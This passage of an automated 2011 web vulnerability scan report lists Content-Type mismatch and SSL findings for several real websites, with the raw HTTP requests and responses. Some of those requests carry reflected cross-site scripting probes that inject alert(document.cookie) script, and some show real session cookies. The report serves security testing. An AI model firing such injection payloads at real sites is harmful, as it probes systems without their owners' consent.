GET /wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php?ver=3.0.1 HTTP/1.1
Host: www.aharrisonbarnes.com
Proxy-Connection: keep-alive
Referer: http://www.aharrisonbarnes.com/?69719'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1fd47fb9727=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6l172e37v71rcv0l37cvee3g96; wpgb_visit_last_php-default=1295654937; wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22caf0b0ec76de78d91869eecad060b7ac%22%3Bi%3A1%3Bi%3A1295654938%3B%7D; wishlist_reg_cookie_manual=1

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:09:08 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 562

/*
* Zero Clipboard Initialization
* Mike Lopez v1.0
*/

var wlmClip = null;

function wlmClipInit(){
ZeroClipboard.setMoviePath('/wp-content/plugins/wishlist-member/js/ZeroClipboard.swf');
wlmC
...[SNIP]...

22.3. http://www.aharrisonbarnes.com/wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php?jsver=common HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:15:35 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 2584

var rpPel = null;
var Commentarea = null;

function $s(){
   if(arguments.length == 1)
       return get$(arguments[0]);

   var elements = [];
   $c(arguments).each(function(el){elements.push(get$(el));});

   r
...[SNIP]...

22.4. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/themes/HB_new_theme/images/career_mission.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /wp-content/themes/HB_new_theme/images/career_mission.png HTTP/1.1
Host: www.aharrisonbarnes.com
Proxy-Connection: keep-alive
Referer: http://www.aharrisonbarnes.com/?69719'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1fd47fb9727=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6l172e37v71rcv0l37cvee3g96; wpgb_visit_last_php-default=1295654937; wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22caf0b0ec76de78d91869eecad060b7ac%22%3Bi%3A1%3Bi%3A1295654938%3B%7D; wishlist_reg_cookie_manual=1

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:09:18 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 16 Sep 2010 12:07:16 GMT
ETag: "12b8101-1f08-4905f497c0500"
Accept-Ranges: bytes
Content-Length: 7944
Content-Type: image/png

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................-....
...[SNIP]...

22.5. http://www.bcgsearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bcgsearch.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.bcgsearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=oe75j7p7vu4b8kk2unodlqkfe7; __utmz=182044340.1295638549.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=182044340.914584213.1295638549.1295638549.1295638549.1; __utmc=182044340; __utmb=182044340.1.10.1295638549

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:35:19 GMT
Server: Apache
Last-Modified: Wed, 02 Dec 2009 12:28:40 GMT
ETag: "970173-37e-479be03b84e00"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...............#...#.....................................................................................................................................................
...[SNIP]...

22.6. http://www.legalauthority.com/tmviewbanner.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/tmviewbanner.php

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain HTML.

Request

GET /tmviewbanner.php?lpgid=2&wsid=19&cid=3553&bid=324&compid=3&style=reg&lpgprty=B&tp=B HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=4b3hf5pu51tq1jopdgjo1vqco4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 305
Connection: close
Content-Type: image/gif

<br />
<b>Warning</b>: file_get_contents(/home/utils/securefiles/xml/mctsbannerimages/324.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such fi
...[SNIP]...

22.7. http://www.toyota.com/img/mobilepromo/mobileLogoBottom.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/img/mobilepromo/mobileLogoBottom.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /img/mobilepromo/mobileLogoBottom.gif HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Jul 2010 18:22:28 GMT
ETag: "3e639-5fc-b33d2100"
Accept-Ranges: bytes
Content-Length: 1532
Content-Type: image/gif
Date: Fri, 21 Jan 2011 19:21:59 GMT
Connection: close

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

...............................................................C..
...[SNIP]...

22.8. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/myGuideParameters.js previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.toyotafinancial.com
Path:	/consumer/framework/skins/tfs/js/myGuideParameters.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /consumer/framework/skins/tfs/js/myGuideParameters.js HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b%22%3balert(document.cookie)//3b7137a4f55
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:47:12 GMT
Content-length: 1316
Last-Modified: Fri, 02 Mar 2007 22:37:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript

vidPlanningCenter = 0;
vidFinancingOptions = 1;
vidUnderstandingCredit = 2;
vidDealershipVisit = 3;
vidVehicleProtectionPlans = 4;
vidPaymentProtectionPlans = 5;
vidPaymentEstimator = 6;
vidCol
...[SNIP]...

23. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lawschoolloans.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.lawschoolloans.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Mar 18 23:41:30 CDT 2010
Valid to:	Thu Mar 24 13:57:20 CDT 2011

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 12:01:25 CST 2011.